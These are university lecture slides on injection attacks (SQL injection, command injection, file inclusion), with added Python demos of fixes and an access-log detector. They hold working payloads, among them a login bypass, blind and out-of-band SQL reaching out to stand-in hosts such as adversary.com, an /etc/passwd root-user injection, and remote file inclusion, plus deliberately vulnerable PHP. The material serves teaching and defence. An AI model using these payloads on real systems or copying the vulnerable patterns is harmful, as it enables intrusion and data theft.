CE441: Data and Network Security - Injection Attacks (ce.sharif.edu/~b_momeni/ce441/10-injection.pdf)
CE441: Data and Network Security
Injection Attacks
Behnam Momeni, PhD
Department of Computer Engineering, Sharif University of Technology
Fall 2019
B. Momeni (Sharif Univ. of Tech.) CE441: Data and Network Security Fall 2019 1 / 36
SQL Injection / SQLi Exploitation Technique: In-band Data Retrieval
Outline
1 SQL Injection
  SQLi Exploitation Technique: In-band Data Retrieval
  SQLi Exploitation Technique: In-band Inferential Attack
  SQLi Exploitation Technique: Out-of-band Data Retrieval
  SQLi Countermeasures: Input Sanitization
  SQLi Countermeasures: Parameterized Query
2 Command Injection
Injection Attacks
When data items are converted from one format to another format...
  ...due to type ambiguity, untrusted inputs might be mixed with trusted inputs
  ...and change the meaning of the produced output, injecting new control elements
XSS vulnerabilities were a subset of the injection vulnerabilities
  Trusted control element: "<a href='/test.html'>...</a>"
  Untrusted input element: "$_GET['title']"
  title=<script>alert('XSS');</script>
  When converted to the string format to create the HTTP response...
  ...injects new control elements (i.e. the <script>)

<?php
// The untrusted title is interpolated straight into the HTML (deliberately vulnerable to XSS)
echo "<a href='/test.html'>{$_GET['title']}</a>";
?>
Structured Query Language (SQL) Injection
SQL allows a web application (the database client) to communicate with a database and perform CRUD:
  Create new records with the INSERT command
  Read existing records with the SELECT command
  Update existing records with the UPDATE command
  Delete existing records with the DELETE command
The query is formatted as a string and so is vulnerable to type ambiguity issues if data inputs are not properly encoded to be distinguished from the SQL keywords
SQL Injection (SQLi) – Example Vulnerable Code

<?php
$mysqli = new mysqli("localhost", "my_user", "my_password", "database_name");
if ($mysqli->connect_errno) {
    printf("Connect failed: %s\n", $mysqli->connect_error);
    exit();
}
// Untrusted POST data is concatenated straight into the SQL text (the injection point)
if ($result = $mysqli->query("SELECT Name FROM City "
        . "WHERE Population < " . $_POST["max_population"])) {
    printf("Query returned %d rows.\n", $result->num_rows);
    process($result);
    $result->close();
}
$mysqli->close();
?>
Basic picture: SQL Injection
Attacker → Victim Server: (1) post malicious form
Victim Server → Victim SQL DB: (2) unintended SQL query
Victim SQL DB → Attacker: (3) receive valuable data
Borrowed from [40442-971:09-web-site-sec.pdf], page 12
Example: buggy login page (ASP)
set ok = execute( "SELECT * FROM Users WHERE user=' " & form("user") & " ' AND pwd=' " & form("pwd") & " '" );
if not ok.EOF login success else fail;
Is this exploitable?
Borrowed from [40442-971:09-web-site-sec.pdf], page 15
Normal Query
Web Browser (Client) → Web Server: Enter Username & Password
Web Server → DB: SELECT * FROM Users WHERE user='me' AND pwd='1234'
Borrowed from [40442-971:09-web-site-sec.pdf], page 16
Bad input
Suppose user = " ' or 1=1 -- " (URL encoded)
Then the script does: ok = execute( SELECT … WHERE user= ' ' or 1=1 -- … )
■ The "--" causes the rest of the line to be ignored.
■ Now ok.EOF is always false and login succeeds.
The bad news: easy login to many sites this way.
Borrowed from [40442-971:09-web-site-sec.pdf], page 17
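The buggy login page above, as an added example that is not part of the original slides: a Python script (chosen so the demonstration runs stand-alone with the standard-library sqlite3 module; the slides use ASP and PHP) builds the same concatenated query, shows why the ' or 1=1 -- input logs in, and puts the parameterized form beside it, which is the fix the deck returns to under SQLi Countermeasures: Parameterized Query. The Users rows and the table layout are constructed for the demonstration.

```python
import sqlite3

# Constructed sample accounts for the demonstration (not from the slides).
USERS = [("me", "1234"), ("alice", "s3cret")]


def make_db() -> sqlite3.Connection:
    """In-memory database with a Users table and the constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (user TEXT, pwd TEXT)")
    conn.executemany("INSERT INTO Users VALUES (?, ?)", USERS)
    return conn


DEMO_DB = make_db()


def build_vulnerable_query(user: str, pwd: str) -> str:
    """String concatenation as in the buggy page: the inputs become part of the SQL text."""
    return "SELECT * FROM Users WHERE user='" + user + "' AND pwd='" + pwd + "'"


def login_vulnerable(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Runs the concatenated query; True when a row comes back (the page's 'not ok.EOF')."""
    rows = conn.execute(build_vulnerable_query(user, pwd)).fetchall()
    return len(rows) > 0


def login_parameterized(conn: sqlite3.Connection, user: str, pwd: str) -> bool:
    """Same check with placeholders: user and pwd travel as values, never as SQL text."""
    rows = conn.execute(
        "SELECT * FROM Users WHERE user=? AND pwd=?", (user, pwd)
    ).fetchall()
    return len(rows) > 0


if __name__ == "__main__":
    print(build_vulnerable_query("' or 1=1 --", "x"))
    print("vulnerable:", login_vulnerable(DEMO_DB, "' or 1=1 --", "x"))
    print("parameterized:", login_parameterized(DEMO_DB, "' or 1=1 --", "x"))
```

With the bad input, the concatenated text becomes SELECT * FROM Users WHERE user='' or 1=1 --' AND pwd='x': the comment swallows the password check and every row matches. The parameterized version compares the whole input string against the user column and finds nothing.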
In-band Data Retrieval: Error-based SQL Injection
Improper error handling allows an adversary to observe SQL query errors...
  ...to observe actual data values
  ...and to learn the query structure, based on the observed errors
e.g. to learn the query structure:
  You have an error in your SQL syntax near '12345678, 123.04, 0, )' at line 2.
e.g. to learn the actual data values:
  ...compute the actual value in a subquery and use it in a way that causes an error

SELECT * FROM Users WHERE username='ali' AND
  EXTRACTVALUE(rand(),CONCAT(0x0a,(the-sub-query)))--
In-band Data Retrieval: UNION-based SQL Injection
Sometimes, the error message is not shown to the user
  But the query results themselves are displayed
  e.g. a player's scores in a game
Extra information from other tables can be extracted...
  ...using a UNION query

SELECT lvl, score FROM Scores WHERE player='ali'
UNION SELECT username, password FROM Users
Second-Order SQL Injection
When untrusted user input is stored in the database...
  ...with proper escaping and without causing SQL injection...
  ...it might be read back and used in yet another SQL query
If developers wrongly trust the data (which is read from the database)...
  ...it can cause a second-order SQL injection

UPDATE Users SET password='newpassphrase'
WHERE username='admin' AND password='oldpassphrase'

UPDATE Users SET password='newpassphrase'
WHERE username='admin' --' AND password='random-password'
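The second-order flow above, as an added example (not code from the slides), in Python with the standard-library sqlite3 module: registration stores the name admin' -- safely through a parameter, the password-change handler later reads that name back and trusts it, and the UPDATE it builds is exactly the one on the slide. The table, the admin row and the handler names are constructed for the demonstration.

```python
import sqlite3

ATTACKER_NAME = "admin' --"   # stored verbatim; it only becomes dangerous when re-spliced into SQL


def make_db() -> sqlite3.Connection:
    """Constructed Users table with an existing admin account."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE Users (username TEXT PRIMARY KEY, password TEXT)")
    conn.execute("INSERT INTO Users VALUES ('admin', 'oldpassphrase')")
    return conn


def register(conn: sqlite3.Connection, username: str, password: str) -> None:
    """First-order safe: the quote in the username is plain data because it is bound as a parameter."""
    conn.execute("INSERT INTO Users VALUES (?, ?)", (username, password))


def load_username(conn: sqlite3.Connection, username: str) -> str:
    """Stands in for 'read the user's name back from the database' (e.g. when building a session)."""
    return conn.execute("SELECT username FROM Users WHERE username=?", (username,)).fetchone()[0]


def change_password_vulnerable(conn, stored_username, old_pw, new_pw) -> str:
    """Trusts the database-sourced name and concatenates it: this is the slide's second UPDATE."""
    sql = ("UPDATE Users SET password='" + new_pw + "' WHERE username='"
           + stored_username + "' AND password='" + old_pw + "'")
    conn.execute(sql)
    return sql


def change_password_fixed(conn, stored_username, old_pw, new_pw) -> None:
    """Data read from the database is still data: bind it like any other input."""
    conn.execute("UPDATE Users SET password=? WHERE username=? AND password=?",
                 (new_pw, stored_username, old_pw))


def password_of(conn: sqlite3.Connection, username: str):
    row = conn.execute("SELECT password FROM Users WHERE username=?", (username,)).fetchone()
    return row[0] if row else None


def run_demo() -> dict:
    """Run the vulnerable and the fixed flow on fresh databases and report the resulting admin passwords."""
    conn = make_db()
    register(conn, ATTACKER_NAME, "random-password")
    stored = load_username(conn, ATTACKER_NAME)
    built_sql = change_password_vulnerable(conn, stored, "random-password", "newpassphrase")
    vulnerable_admin_pw = password_of(conn, "admin")

    conn = make_db()
    register(conn, ATTACKER_NAME, "random-password")
    change_password_fixed(conn, load_username(conn, ATTACKER_NAME), "random-password", "newpassphrase")
    return {
        "stored_username": stored,
        "built_sql": built_sql,
        "vulnerable_admin_pw": vulnerable_admin_pw,
        "fixed_admin_pw": password_of(conn, "admin"),
        "fixed_attacker_pw": password_of(conn, ATTACKER_NAME),
    }


if __name__ == "__main__":
    for key, value in run_demo().items():
        print(f"{key}: {value}")
```

In the vulnerable flow the comment marker cuts the WHERE clause down to username='admin', so the admin's password changes even though the attacker never knew it; in the fixed flow only the attacker's own row changes.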
SQLi Is A Functionality Bug Too
A subset of inputs (those which corrupt the query) cannot be used
Image Ref: https://www.xkcd.com/327/
SQL Injection / SQLi Exploitation Technique: In-band Inferential Attack
In-band Inferential Attack: Boolean-based
Sometimes, data cannot be retrieved directly
  Neither error messages are displayed nor query results shown to users
But the rendered page reflects some state read from the database
  e.g. when the query is not well-formed, a generic error page is shown
  e.g. when the query has a non-empty result, a button is enabled
These boolean-based differences (normal page vs. error page) leak a single bit of information about the database
  Also called a blind SQL injection
In-band Inferential Attack: Time-based
Sometimes, the state of the database, independent of the SQL injection, is not reflected in the HTTP response
  e.g. a second query blocks/abandons the SQL injection results
Although not even a bit of information can be extracted through the HTTP response body, the SQL injection can affect the overall response time
If a true or false condition is detected in the injected query, it may run through a fast or slow path to differentiate the two scenarios

SELECT * FROM User WHERE username='admin'
AND password='1234'
OR IF(SUBSTRING(password,1,1)<'h',SLEEP(2),0)=0 --'
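Seen from the defending side, the three in-band techniques of the last slides (error-based, boolean-based and time-based) each leave a signature in the web server's access log: bursts of 5xx responses, or of abnormally slow responses, to requests whose parameters carry SQL metacharacters. The following detection pass is an added example, not part of the slides; the log line format (client, path, status, response time in ms, raw query string), the sample lines and the thresholds are all constructed for the demonstration.

```python
import re
from collections import defaultdict

# Constructed access-log lines: "<client_ip> <path> <status> <response_ms> <query string>".
SAMPLE_LOG_LINES = [
    "10.0.0.5 /scores 200 41 player=ali",
    "10.0.0.5 /scores 200 39 player=bob",
    "10.0.0.9 /scores 500 12 player=ali'",
    "10.0.0.9 /scores 500 13 player=ali' AND EXTRACTVALUE(1,CONCAT(0x0a,(SELECT 1)))--",
    "10.0.0.9 /scores 500 11 player=ali'--",
    "10.0.0.7 /login 200 40 user=admin' AND 1=1 --",
    "10.0.0.7 /login 200 2045 user=admin' AND IF(1=1,SLEEP(2),0)=0 --",
    "10.0.0.7 /login 200 39 user=admin' AND IF(1=2,SLEEP(2),0)=0 --",
    "10.0.0.7 /login 200 2051 user=admin' AND IF(SUBSTRING(password,1,1)<'h',SLEEP(2),0)=0 --",
]

LINE_RE = re.compile(r"^(?P<ip>\S+) (?P<path>\S+) (?P<status>\d{3}) (?P<ms>\d+) (?P<query>.*)$")
# Quote, line comment and block comment are the string-context breakouts this deck discusses.
SQL_META_RE = re.compile(r"'|--|/\*")


def parse_log(lines):
    """Parse the constructed format into dicts; lines that do not match are skipped."""
    records = []
    for line in lines:
        m = LINE_RE.match(line)
        if m:
            records.append({"ip": m["ip"], "path": m["path"], "status": int(m["status"]),
                            "ms": int(m["ms"]), "query": m["query"]})
    return records


def find_sqli_probing(records, min_events=3, slow_ms=2000, min_slow=2):
    """Per client, count requests carrying SQL metacharacters and classify the probing pattern.

    Returns {client_ip: [labels]}; legitimate apostrophes (O'Brien) also match SQL_META_RE,
    so the counts are thresholds, not single-event alerts."""
    per_client = defaultdict(lambda: {"meta": 0, "errors": 0, "slow": 0})
    for r in records:
        if not SQL_META_RE.search(r["query"]):
            continue
        stats = per_client[r["ip"]]
        stats["meta"] += 1
        if 500 <= r["status"] < 600:
            stats["errors"] += 1            # error-based: the database error reaches the client
        if r["ms"] >= slow_ms:
            stats["slow"] += 1              # time-based: the injected SLEEP shows up as latency
    findings = {}
    for ip, s in per_client.items():
        labels = []
        if s["errors"] >= min_events:
            labels.append("error-based probing")
        if s["slow"] >= min_slow:
            labels.append("time-based blind probing")
        if s["meta"] >= min_events:
            labels.append("repeated SQL metacharacters (boolean/blind probing)")
        if labels:
            findings[ip] = labels
    return findings


if __name__ == "__main__":
    for ip, labels in find_sqli_probing(parse_log(SAMPLE_LOG_LINES)).items():
        print(ip, "->", ", ".join(labels))
```

Boolean-based probing has no status or timing signature of its own (the page renders normally either way), which is why the third label rests only on the volume of metacharacter-bearing requests from one client to one application; in practice the response-size or template difference the attacker relies on is a better discriminator if the application logs it.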
SQL Injection / SQLi Exploitation Technique: Out-of-band Data Retrieval
Out-of-band Data Retrieval
Data exfiltration is possible through an independent channel
  e.g. writing into a file which is served by an HTTP server
  e.g. exporting to a remote server directly
  e.g. loading data & leaking some data through the URL
  e.g. leaking data through a DNS request
Significantly speeds up the exfiltration process (in comparison to blind scenarios)
  but requires the FILE privilege, which might be unavailable

SELECT 'any-data' INTO OUTFILE '/var/www/html/data.txt';
SELECT 'any-data' INTO DUMPFILE '\\\\1.2.3.4\\data.txt';
SELECT LOAD_FILE('\\\\1.2.3.4\\somedata');
LOAD DATA INFILE '\\\\1.2.3.4\\somedata' INTO TABLE Temp;
SELECT LOAD_FILE(CONCAT('\\\\',
  (some_query_with_one_row_result), '.adversary.com\\'))
SQL Injection / SQLi Countermeasures: Input Sanitization
SQLi Countermeasures: Input Sanitization (1/3)
The untrusted input might contain SQL keywords
  Solution 1: detect and remove SQL keywords
Pitfall: SELINSERTECT → SELECT
SQLi Countermeasures: Input Sanitization (2/3)
The untrusted input might contain SQL keywords
  Solution 2: enclose the input in quotation marks and escape quotation marks
  e.g. username='1\' OR 1=1 --'
Pitfall: username='1\' OR 1=1 --'
  → username='1\\' OR 1=1 --'
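Both pitfalls from Input Sanitization (1/3) and (2/3), worked through in Python as an added example that is not part of the slides: a single-pass keyword stripper that turns SELINSERTECT into SELECT (and, once iterated to a fixed point, mangles ordinary input instead), and a quote escaper that forgets to escape the escape character, beside the corrected escaper. The small scanner at the end decides whether a string body still contains an unescaped quote, i.e. whether the input can close the literal; the keyword list and the sample inputs are constructed.

```python
import re

SQL_KEYWORDS = ("SELECT", "INSERT", "UPDATE", "DELETE", "UNION")


def strip_keywords_once(s: str) -> str:
    """Solution 1 as a single pass: removing the inner INSERT re-creates SELECT."""
    for kw in SQL_KEYWORDS:
        s = re.sub(kw, "", s, flags=re.IGNORECASE)
    return s


def strip_keywords_until_stable(s: str) -> str:
    """Iterating to a fixed point closes the SELINSERTECT hole, but the approach stays lossy:
    any legitimate value that happens to contain a keyword is silently changed."""
    while True:
        stripped = strip_keywords_once(s)
        if stripped == s:
            return stripped
        s = stripped


def escape_quote_naive(s: str) -> str:
    """Solution 2 done wrong: only the quote is escaped, so an input backslash can pair with the added one."""
    return s.replace("'", "\\'")


def escape_quote_properly(s: str) -> str:
    """Escape the escape character first, then the quote; now no input byte can consume the inserted backslash."""
    return s.replace("\\", "\\\\").replace("'", "\\'")


def breaks_out_of_literal(body: str) -> bool:
    """Scan a MySQL-style single-quoted string body, where a backslash escapes the next character.
    True when an unescaped quote remains, i.e. the value would terminate the literal early."""
    i = 0
    while i < len(body):
        if body[i] == "\\":
            i += 2          # escaped character: skip it whatever it is
            continue
        if body[i] == "'":
            return True
        i += 1
    return False


if __name__ == "__main__":
    payload = "1\\' OR 1=1 --"   # the slide's 1\' OR 1=1 --
    print(strip_keywords_once("SELINSERTECT"))
    print(escape_quote_naive(payload), breaks_out_of_literal(escape_quote_naive(payload)))
    print(escape_quote_properly(payload), breaks_out_of_literal(escape_quote_properly(payload)))
```

Even the corrected escaper is only right for one connection charset and one quoting convention (the next slides show how encodings break it), which is why the deck ends at parameterized queries rather than at a better escaper.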
SQLi Countermeasures: Input Sanitization (3/3)
The untrusted input might contain SQL keywords
  Solution 3: use a library to properly escape quotation marks

<?php
$username = addslashes("' OR 1=1 --");
$query = "... username='".$username."' AND ...";
?>

Pitfall: Encoding Attacks!
Encoding Attacks: The Homoglyphs Feature!
Microsoft SQL Server supports Unicode characters
  e.g. the NVARCHAR and NCHAR types or N'strings'
During implicit or explicit conversion from a Unicode type to a non-Unicode type, SQL Server automatically replaces characters with their most visually similar counterparts (i.e. homoglyphs) in the target character set

-- http://sqlfiddle.com/#!18/9eecb/63575
SELECT CAST(N'ŚℇℒℇℂƮʼ' AS nchar) AS UnicodeChar,
       CAST(N'ŚℇℒℇℂƮʼ' AS char) AS NonUnicodeChar

UnicodeChar   NonUnicodeChar
ŚℇℒℇℂƮʼ       SELECT'
Encoding Attacks: Non-Shortest Form UTF-8
UTF-8 characters use a variable-length coding
  One byte for common Latin characters
  Two bytes for most of the other languages
  Longer codes for rare symbols including emoji characters (U+263A)
It is possible to encode any one-byte character using a two-byte character too, but it is illegal to use these non-shortest forms
The single-quote character is represented as 39 (0x27)
  ...it can also be represented as 0xC0A7
The addslashes function scans for 0x27 bytes
  Solution: mysqli_real_escape_string

#Codepoint Bits | First Valid Codepoint | Last Valid Codepoint | Byte 1    | Byte 2    | Byte 3    | Byte 4
7               | U+0000                | U+007F               | 0xxx xxxx | unused    | unused    | unused
11              | U+0080                | U+07FF               | 110x xxxx | 10xx xxxx | unused    | unused
16              | U+0800                | U+FFFF               | 1110 xxxx | 10xx xxxx | 10xx xxxx | unused
21              | U+10000               | U+10FFFF             | 1111 0xxx | 10xx xxxx | 10xx xxxx | 10xx xxxx
Encoding Attacks: Consuming Escape Characters
In Asian encodings such as Guojia Biaozhun Kuozhan (GBK), a standard for simplified Chinese characters, a valid multi-byte character might have the escape character as a suffix
  0xBF 0x27 (where 0x27 represents a single quote in ASCII) might be escaped by adding a backslash, which is represented by 0x5C in ASCII
  → 0xBF 0x5C 0x27
  But 0xBF5C is a valid Chinese character in GBK...
  → 0xBF5C 0x27 (a non-escaped single quote)
In UTF-8, no multi-byte character may be terminated by 0x5C
  However, a wrong implementation might consume extra invalid bytes (a 0xC0 byte indicates a two-byte character, which might consume the following 0x5C even though it is less than 0x80)
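The two encoding attacks of this slide and the previous one (non-shortest form UTF-8 and escape-byte consumption in GBK), reproduced byte by byte in Python as an added example that is not part of the slides. The escaper below models a charset-unaware addslashes(); the lenient decoder is a deliberately buggy toy that accepts overlong two-byte sequences; Python's own strict codecs play the role of the correct implementation. All inputs are constructed, and the fix shown is the one the deck names: decode with the connection's charset first (or let the driver do it, as mysqli_real_escape_string does), then escape characters rather than bytes.

```python
def addslashes_bytes(data: bytes) -> bytes:
    """Charset-unaware escaper modelled on addslashes(): prefixes every 0x27 ('), 0x22 (") and 0x5C (\\) byte with 0x5C."""
    out = bytearray()
    for b in data:
        if b in (0x27, 0x22, 0x5C):
            out.append(0x5C)
        out.append(b)
    return bytes(out)


def decode_utf8_leniently(data: bytes) -> str:
    """Toy decoder with the bug an overlong form relies on: two-byte sequences are accepted without the
    shortest-form check. Only ASCII and the two-byte case are modelled; other bytes pass through one by one."""
    out, i = [], 0
    while i < len(data):
        b = data[i]
        if 0xC0 <= b <= 0xDF and i + 1 < len(data) and 0x80 <= data[i + 1] <= 0xBF:
            out.append(chr(((b & 0x1F) << 6) | (data[i + 1] & 0x3F)))   # 0xC0 0xA7 -> U+0027 here
            i += 2
        else:
            out.append(chr(b))
            i += 1
    return "".join(out)


def is_well_formed(data: bytes, charset: str) -> bool:
    """Strict decoding: Python's codecs reject overlong UTF-8 (0xC0 is never a valid lead byte)
    and a GBK lead byte followed by a byte outside the trail range (0x27 after 0xBF)."""
    try:
        data.decode(charset)
        return True
    except UnicodeDecodeError:
        return False


def gbk_escape_then_decode(data: bytes) -> str:
    """What the database sees when a byte-level escaper runs before GBK decoding."""
    return addslashes_bytes(data).decode("gbk")


def escape_after_strict_decode(data: bytes, charset: str) -> str:
    """The corrected order: decode with the connection charset (raises on malformed input), then escape characters."""
    text = data.decode(charset)
    return text.replace("\\", "\\\\").replace("'", "\\'")


if __name__ == "__main__":
    overlong = b"1\xc0\xa7 OR 1=1"          # the slide's 0xC0A7 in place of 0x27
    print(addslashes_bytes(overlong) == overlong, decode_utf8_leniently(overlong))
    print(addslashes_bytes(b"\xbf\x27"), gbk_escape_then_decode(b"\xbf\x27"))
    print(is_well_formed(overlong, "utf-8"), is_well_formed(b"\xbf\x27", "gbk"))
```

For the overlong input the escaper sees no 0x27 byte and changes nothing, while the lenient decoder later produces a real quote; for the GBK input the escaper inserts 0x5C, which the decoder swallows as the trail byte of one CJK character, leaving the quote unescaped. In both cases the strict decoder refuses the bytes before any escaping takes place, which is the property to test for in your own escaping layer.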
SQL Injection / SQLi Countermeasures: Parameterized Query
SQLi Countermeasures: Parameterized Query
The root cause of SQL injection vulnerabilities was the type ambiguity
  It can be fixed by not mixing the query and user inputs
  Inputs are passed separately as parameters
  The query is prepared beforehand and can be reused
  ...(re)executed with a set of parameter values

<?php
$stmt = mysqli_prepare($link, "SELECT username FROM Users WHERE username=? AND password=?");
mysqli_stmt_bind_param($stmt, 'ss', $username, $password);
$username = $_POST['usr']; // variables are linked
$password = $_POST['pwd']; // by reference
mysqli_stmt_execute($stmt);
mysqli_stmt_bind_result($stmt, $res_username);
while (mysqli_stmt_fetch($stmt)) {
    printf("%s\n", $res_username);
}
mysqli_stmt_close($stmt);
?>
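The reuse point of this slide, applied to the numeric Population query from the Example Vulnerable Code slide, as an added example in Python with the standard-library sqlite3 module (not the deck's PHP code). The same prepared statement is re-executed over a set of thresholds, and a value such as 1000000 OR 1=1 is shown to arrive as a string that is compared, never parsed. The City rows and the boundary validator are constructed; the last assertion also records a caveat of the demonstration's own engine: SQLite orders every integer below any text value, so a non-numeric string bound into an integer comparison matches every row, which is an argument for validating the type at the boundary even though no injection occurs.

```python
import sqlite3

# Constructed sample rows (not from the slides).
CITIES = [("Tehran", 8700000), ("Qom", 1200000), ("Kashan", 300000), ("Abyaneh", 300)]

# Prepared once; the '?' placeholder is the only thing the untrusted threshold can ever fill.
SMALL_CITIES_SQL = "SELECT Name FROM City WHERE Population < ? ORDER BY Population"


def make_db() -> sqlite3.Connection:
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE City (Name TEXT, Population INTEGER)")
    conn.executemany("INSERT INTO City VALUES (?, ?)", CITIES)
    return conn


DEMO_DB = make_db()


def parse_max_population(raw) -> int:
    """Boundary validation: the request field must be a non-negative integer before it is bound."""
    if not (isinstance(raw, str) and raw.isdigit()):
        raise ValueError("max_population must be a non-negative integer")
    return int(raw)


def is_rejected(raw) -> bool:
    try:
        parse_max_population(raw)
        return False
    except ValueError:
        return True


def small_cities(conn: sqlite3.Connection, max_population) -> list:
    """Execute the prepared query with one bound value."""
    return [name for (name,) in conn.execute(SMALL_CITIES_SQL, (max_population,))]


def small_cities_batch(conn: sqlite3.Connection, raw_thresholds) -> dict:
    """Re-execute the same statement for a set of validated parameter values."""
    return {raw: small_cities(conn, parse_max_population(raw)) for raw in raw_thresholds}


if __name__ == "__main__":
    print(small_cities_batch(DEMO_DB, ["1000", "1000000", "5000000"]))
    print(is_rejected("1000000 OR 1=1"))
    # Bound as a string, the same text is a value: no 'OR 1=1' is ever parsed as SQL.
    print(small_cities(DEMO_DB, "1000000 OR 1=1"))
```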
Command Injection / Remote Code Execution (RCE)
Outline
1 SQL Injection
2 Command Injection
  Remote Code Execution (RCE)
  File Inclusion
Remote Code Execution (RCE)
Dynamic evaluation of untrusted user input
  e.g. a calculator
  ...requires careful input sanitization to prevent code execution

<?php
$f = $_GET['formula']; // 2+3*4
eval("\$f = $f;");
echo "Result: $f";
?>
Code injection using system()
Example: PHP server-side code for sending email
  $email = $_POST["email"]
  $subject = $_POST["subject"]
  system("mail $email -s $subject < /tmp/joinmynetwork")
Attacker can post
  http://yourdomain.com/mail.php?[email protected]&subject=foo < /usr/passwd; ls
OR
  http://yourdomain.com/mail.php?[email protected]&subject=foo; echo "evil::0:0:root:/:/bin/sh">>/etc/passwd; ls
Borrowed from [40442-971:09-web-site-sec.pdf], page 9
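The mail example above fails because the inputs are spliced into one string that a shell then parses, so ; and < become operators. The added example below (Python, not the slide's PHP, and not from the slides) keeps the vulnerable string for comparison and beside it builds an argument vector that is handed to the process without any shell: each input stays one argv element whatever characters it contains. The child process is a Python one-liner that echoes its argv back, so the demonstration runs offline; the address regex, the subject rules and the sample inputs are constructed.

```python
import json
import re
import subprocess
import sys

# Constructed, deliberately strict address syntax: no spaces, no shell metacharacters can pass.
EMAIL_RE = re.compile(r"^[A-Za-z0-9._%+-]+@[A-Za-z0-9-]+(\.[A-Za-z0-9-]+)*\.[A-Za-z]{2,}$")
MAX_SUBJECT_LEN = 200


def vulnerable_command(email: str, subject: str) -> str:
    """The slide's pattern: one shell string, so ';', '<' and '>' in the inputs act as shell operators."""
    return f"mail {email} -s {subject} < /tmp/joinmynetwork"


def build_mail_argv(email: str, subject: str) -> list:
    """Hardened: validate at the boundary, then pass every input as its own argv element (no shell)."""
    if not EMAIL_RE.match(email):
        raise ValueError("invalid e-mail address")
    if "\n" in subject or "\r" in subject or len(subject) > MAX_SUBJECT_LEN:
        raise ValueError("invalid subject")
    return ["mail", "-s", subject, email]


def rejects_mail(email: str, subject: str) -> bool:
    try:
        build_mail_argv(email, subject)
        return False
    except ValueError:
        return True


def echo_argv(argv_tail: list) -> list:
    """Start a child without a shell and return the argv it actually received.
    The child is a Python one-liner (constructed stand-in for the real mail binary)."""
    proc = subprocess.run(
        [sys.executable, "-c", "import sys, json; print(json.dumps(sys.argv[1:]))", *argv_tail],
        capture_output=True, text=True, check=True,
    )
    return json.loads(proc.stdout)


if __name__ == "__main__":
    print(vulnerable_command("user@example.com", "foo < /usr/passwd; ls"))
    print(echo_argv(build_mail_argv("user@example.com", "foo < /usr/passwd; ls")[1:]))
    print(rejects_mail("user@example.com; ls", "foo"))
```

Note that the argv form only removes the shell from the path; the subject still reaches the mail program as data, which is why the validator also refuses line breaks (a subject is a header line) and why the address is validated rather than merely quoted.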
Command Injection / File Inclusion
Local File Inclusion (LFI)
A server-side script might run a sub-script based on user input
  The sub-script is locally present on the server
The adversary might be able to choose & run unexpected scripts
  e.g. some script from another folder (directory traversal)
  e.g. some text file which was uploaded by the adversary beforehand

<?php
include("subroutines/" . $_GET['routine_name']);
// ../../private/authorized/backend.php
// ../upload/evilshell.txt
?>
LFI Countermeasure
Do not pass user input into the file inclusion constructs
  Instead, check the user input and use some constant string based on it
Suboptimal solutions:
  limit the file extension
  mitigate relative paths

<?php
if ($_GET['routine_name'] === 'register') {
    include("subroutines/register.php");
} elseif ($_GET['routine_name'] === 'greet') {
    include("subroutines/greetings.php");
} else {
    die("bad routine name");
}
?>
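The countermeasure above in Python, as an added example that is not part of the slides: the allow-list maps the untrusted routine name to a constant file name and refuses anything else, while the two "suboptimal" checks (appending an extension, containing the resolved path) are implemented beside it so their gaps are visible. The base directory, the routine table and the check names are constructed for the demonstration.

```python
import os
import re

BASE_DIR = os.path.abspath("subroutines")          # constructed location of the sub-scripts
ROUTINES = {"register": "register.php", "greet": "greetings.php"}   # the slide's two routines
SCHEME_RE = re.compile(r"^[A-Za-z][A-Za-z0-9+.-]*://")


def resolve_routine_allowlist(routine_name: str) -> str:
    """Recommended: the input selects among constant strings; it never becomes part of the path."""
    try:
        return os.path.join(BASE_DIR, ROUTINES[routine_name])
    except KeyError:
        raise ValueError("bad routine name") from None


def rejects_routine(routine_name: str) -> bool:
    try:
        resolve_routine_allowlist(routine_name)
        return False
    except ValueError:
        return True


def resolve_routine_extension_only(routine_name: str) -> str:
    """Suboptimal: forcing '.php' narrows what can be included but leaves traversal untouched."""
    return os.path.join("subroutines", routine_name + ".php")


def stays_inside_base(path: str) -> bool:
    """Suboptimal: a containment check on the resolved path blocks '..' traversal ..."""
    real = os.path.realpath(path)
    return os.path.commonpath([BASE_DIR, real]) == BASE_DIR


def looks_like_stream_url(routine_name: str) -> bool:
    """... but says nothing about inputs an include() would hand to a stream wrapper (php://, http://)."""
    return SCHEME_RE.match(routine_name) is not None


if __name__ == "__main__":
    print(resolve_routine_allowlist("greet"))
    print(rejects_routine("../upload/evilshell.txt"))
    traversal = resolve_routine_extension_only("../../private/authorized/backend")
    print(traversal, stays_inside_base(traversal))
```

The containment check is a reasonable second layer, but it reasons about the filesystem only: the string php://filter/convert.base64-encode/resource=index from the next slides has no '..' in it and still must never reach include(), which the allow-list guarantees and the path check does not.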
Obtaining Source Files Using LFI
If the adversary can select arbitrary schemes for an LFI case
  One possible selection would be to enable PHP filters
  Ref: https://www.php.net/manual/en/filters.php
For example,
  http://example.com/index.php?f=php://filter/convert.base64-encode/resource=index
  ...the index.php resource will be base64-encoded and returned

<?php
include($_GET['f'] . ".php");
?>
Remote File Inclusion (RFI)
When no prefix is used while specifying the included file URI, the adversary can use any scheme and include remote files too
In PHP, allow_url_include should be on for RFI to work
The remote (hosted) script is downloaded and executed by the server

<?php
include($_GET['routine_name'] . ".php");
// http://adversary.com/evil
?>
References and Further Reading
[40442-971:09-web-site-sec.pdf] Mehdi Kharrazi, "CE 442/Computer and Network Security – Lecture 9 - Web Application Security," Sharif University of Technology, Online: http://sharif.edu/~kharrazi/courses/40442-971/09-web-site-sec.pdf, 2018
[homogplyphs-injection] Bert Wagner, "ʼ;ŚℇℒℇℂƮ *: How Unicode Homoglyphs Will Break Your Custom SQL Injection Sanitizing Functions," HackerNoon, Online: http://hackernoon.storage.googleapis.com/%CA%BC-%C5%9B%E2%84%87%E2%84%92%E2%84%87%E2%84%82%CA%88-how-unicode-homoglyphs-will-break-your-custom-sql-injection-sanitizing-functions-1224377f7b51, 2017
[overlong-utf8] Eduardo Vela, "A couple of unicode issues on PHP and Firefox," SirDarckCat Blog, Online: http://sirdarckcat.blogspot.com/2009/10/couple-of-unicode-issues-on-php-and.html, 2009
[consuming-utf8-bytes] Chris Shiflett, "addslashes() Versus mysql_real_escape_string()," Shiflett Blog, Online: http://shiflett.org/blog/2006/addslashes-versus-mysql-real-escape-string, 2006